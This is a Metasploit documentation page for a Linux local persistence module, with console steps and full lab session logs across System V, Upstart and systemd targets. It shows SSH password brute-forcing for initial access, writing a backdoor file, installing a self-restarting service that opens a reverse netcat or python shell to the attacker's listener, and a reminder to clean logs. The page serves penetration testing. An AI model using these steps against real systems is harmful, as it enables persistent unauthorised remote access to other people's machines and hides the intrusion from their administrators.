adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
4e61596e7aff309bf20bbc8ee69f2c2ceda10037
metasploit-gs/documentation/modules/exploit/linux/local/service_persistence.md
T
h00die 557a15a115 spelling fixes on docs
2023-10-10 14:46:18 -04:00

306 lines
12 KiB
Markdown
Raw Blame History

### Creating A Testing Environment
This module has been tested against:
1. Kali 2.0 (System V)
2. Ubuntu 14.04 (Upstart)
3. Ubuntu 16.04 (systemd)
4. Ubuntu 16.04 (systemd user)
5. Centos 5 (System V)
6. Fedora 18 (systemd)
7. Fedora 20 (systemd)
## Verification Steps
1. Start msfconsole
2. Exploit a box via whatever method
3. Do: `use exploit/linux/local/service_persistence`
4. Do: `set session #`
5. Do: `set verbose true`
6. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
7. Optional Do: `set SHELLAPTH /bin` if needed for compatibility on remote system.
8. Do: `set lhost`
9. Do: `exploit`
10. Do: `use exploit/multi/handler`
11. Do: `set payload cmd/unix/reverse_python` or `payload cmd/unix/reverse_netcat` depending on system.
12. Do: `set lhost`
13. Do: `exploit -j`
14. Kill your shell (if System V, reboot target). Upstart/systemd wait 10sec
15. Get Shell
## Options
**target**
There are several targets selectable, which all have their own issues.
0. Automatic: Detect the service handler automatically based on running `which` to find the admin binaries
1. System V: There is no automated restart, so while you'll get a shell, if it crashes, you'll need to wait for a init shift to restart the process automatically (like a reboot). This logs to syslog or /var/log/<process>.log and .err
2. Upstart: Logs to its own file. This module is set to restart the shell after a 10sec pause, and do this forever.
3. systemd and systemd user: This module is set to restart the shell after a 10sec pause, and do this forever.
**SHELLPATH**
If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here. Default is /usr/local/bin
**SERVICE**
The name of the service to create. If not chosen, a 7 character random one is created.
**SHELL_NAME**
The name of the file to write with our shell. If not chosen, a 5 character random one is created.
## Scenarios
### System V (Centos 5 - root - chkconfig)
Get initial access
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts 192.168.199.131
rhosts => 192.168.199.131
msf auxiliary(ssh_login) > set username root
username => root
msf auxiliary(ssh_login) > set password centos
password => centos
msf auxiliary(ssh_login) > exploit
[*] 192.168.199.131:22 SSH - Starting bruteforce
[+] 192.168.199.131:22 SSH - Success: 'root:centos' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=root:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-398.el5 #1 SMP Tue Sep 16 20:51:48 EDT 2014 i686 i686 i386 GNU/Linux '
[*] Command shell session 1 opened (192.168.199.128:49359 -> 192.168.199.131:22) at 2016-06-22 14:27:38 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Install our callback service (system_v w/ chkconfig). Note we change SHELLPATH since /usr/local/bin isnt in the path for CentOS 5 services.
msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set SHELLPATH /bin
SHELLPATH => /bin
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(service_persistence) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(service_persistence) > exploit
[*] Started reverse handler on 192.168.199.128:4444
[*] Writing backdoor to /bin/GUIJc
[*] Max line length is 65537
[*] Writing 95 bytes in 1 chunks of 329 bytes (octal-encoded), using printf
[*] Utilizing System_V
[*] Utilizing chkconfig
[*] Writing service: /etc/init.d/HqdezBF
[*] Max line length is 65537
[*] Writing 1825 bytes in 1 chunks of 6409 bytes (octal-encoded), using printf
[*] Enabling & starting our service
[*] Command shell session 2 opened (192.168.199.128:4444 -> 192.168.199.131:56182) at 2016-06-22 14:27:50 -0400
Reboot the box to prove persistence
reboot
^Z
Background session 2? [y/N] y
msf exploit(service_persistence) > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(handler) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.199.128:4444
[*] Starting the payload handler...
[*] Command shell session 3 opened (192.168.199.128:4444 -> 192.168.199.131:44744) at 2016-06-22 14:29:32 -0400
### Upstart (Ubuntu 14.04.4 Server - root)
Of note, I allowed Root login via SSH w/ password only to gain easy initial access
Get initial access
msf auxiliary(ssh_login) > exploit
[*] 10.10.60.175:22 SSH - Starting bruteforce
[+] 10.10.60.175:22 SSH - Success: 'root:ubuntu' 'uid=0(root) gid=0(root) groups=0(root) Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:27 UTC 2016 i686 i686 i686 GNU/Linux '
[*] Command shell session 1 opened (10.10.60.168:43945 -> 10.10.60.175:22) at 2016-06-22 08:03:15 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Install our callback service (Upstart)
msf auxiliary(ssh_login) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(service_persistence) > set lhost 10.10.60.168
lhost => 10.10.60.168
msf exploit(service_persistence) > exploit
[*] Started reverse handler on 10.10.60.168:4444
[*] Writing backdoor to /usr/local/bin/bmmjv
[*] Max line length is 65537
[*] Writing 429 bytes in 1 chunks of 1650 bytes (octal-encoded), using printf
[*] Utilizing Upstart
[*] Writing /etc/init/Hipnufl.conf
[*] Max line length is 65537
[*] Writing 236 bytes in 1 chunks of 874 bytes (octal-encoded), using printf
[*] Starting service
[*] Dont forget to clean logs: /var/log/upstart/Hipnufl.log
[*] Command shell session 5 opened (10.10.60.168:4444 -> 10.10.60.175:44368) at 2016-06-22 08:23:46 -0400
And now, we can kill the callback shell from our previous session
^Z
Background session 5? [y/N] y
msf exploit(service_persistence) > sessions -i 1
[*] Starting interaction with 1...
netstat -antp | grep 4444
tcp 0 0 10.10.60.175:44368 10.10.60.168:4444 ESTABLISHED 1783/bash
tcp 0 0 10.10.60.175:44370 10.10.60.168:4444 ESTABLISHED 1789/python
kill 1783
[*] 10.10.60.175 - Command shell session 5 closed. Reason: Died from EOFError
kill 1789
Now with a multi handler, we can catch Upstart restarting the process every 10sec
msf > use exploit/multi/handler
msf exploit(handler) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(handler) > set lhost 10.10.60.168
lhost => 10.10.60.168
msf exploit(handler) > exploit
[*] Started reverse handler on 10.10.60.168:4444
[*] Starting the payload handler...
[*] Command shell session 3 opened (10.10.60.168:4444 -> 10.10.60.175:44390) at 2016-06-22 08:26:48 -0400
### systemd (Ubuntu 16.04 Server - root)
Ubuntu 16.04 doesn't have many of the default shell options, however `cmd/unix/reverse_netcat` works.
While python shellcode works on previous systems, on 16.04 the path is `python3`, and therefore `python` will fail the shellcode.
Get initial access
msf exploit(handler) > use exploit/linux/local/service_persistence
msf exploit(service_persistence) > set session 1
session => 1
msf exploit(service_persistence) > set verbose true
verbose => true
msf exploit(service_persistence) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(service_persistence) > set lhost 192.168.199.128
lhost => 192.168.199.128
msf exploit(service_persistence) > exploit
[*] Started reverse handler on 192.168.199.128:4444
[*] Writing backdoor to /usr/local/bin/JSRCF
[*] Max line length is 65537
[*] Writing 103 bytes in 1 chunks of 361 bytes (octal-encoded), using printf
[*] Utilizing systemd
[*] /lib/systemd/system/YelHpCx.service
[*] Max line length is 65537
[*] Writing 151 bytes in 1 chunks of 579 bytes (octal-encoded), using printf
[*] Enabling service
[*] Starting service
[*] Command shell session 7 opened (192.168.199.128:4444 -> 192.168.199.130:47050) at 2016-06-22 10:35:07 -0400
^Z
Background session 7? [y/N] y
Kill the process on the Ubuntu target box via local access #good_admin
root@ubuntu:/etc/systemd/system/multi-user.target.wants# netstat -antp | grep 4444
tcp 0 0 192.168.199.130:47052 192.168.199.128:4444 ESTABLISHED 5632/nc
root@ubuntu:/etc/systemd/system/multi-user.target.wants# kill 5632
And logically, we lose our shell
[*] 192.168.199.130 - Command shell session 7 closed. Reason: Died from EOFError
Now with a multi handler, we can catch systemd restarting the process every 10sec
msf exploit(service_persistence) > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.199.128 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.199.128:4444
[*] Starting the payload handler...
[*] Command shell session 8 opened (192.168.199.128:4444 -> 192.168.199.130:47056) at 2016-06-22 10:37:30 -0400
### systemd user (Ubuntu 16.04 Server - vagrant)
msf5 exploit(linux/local/service_persistence) > options
Module options (exploit/linux/local/service_persistence):
Name Current Setting Required Description
---- --------------- -------- -----------
SERVICE no Name of service to create
SESSION -1 yes The session to run this module on.
SHELLPATH /tmp yes Writable path to put our shell
SHELL_NAME no Name of shell file to write
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.28.128.1 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
4 systemd user
msf5 exploit(linux/local/service_persistence) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Writing backdoor to /tmp/PPpCF
[*] Max line length is 65537
[*] Writing 94 bytes in 1 chunks of 330 bytes (octal-encoded), using printf
[*] Creating user service directory
[*] Writing service: /home/vagrant/.config/systemd/user/OzzdRBC.service
[*] Max line length is 65537
[*] Writing 203 bytes in 1 chunks of 778 bytes (octal-encoded), using printf
[*] Reloading manager configuration
[*] Enabling service
[*] Starting service: OzzdRBC
[*] Command shell session 2 opened (172.28.128.1:4444 -> 172.28.128.3:52564) at 2019-03-06 00:22:40 -0600
id
uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
Reference in New Issue View Git Blame Copy Permalink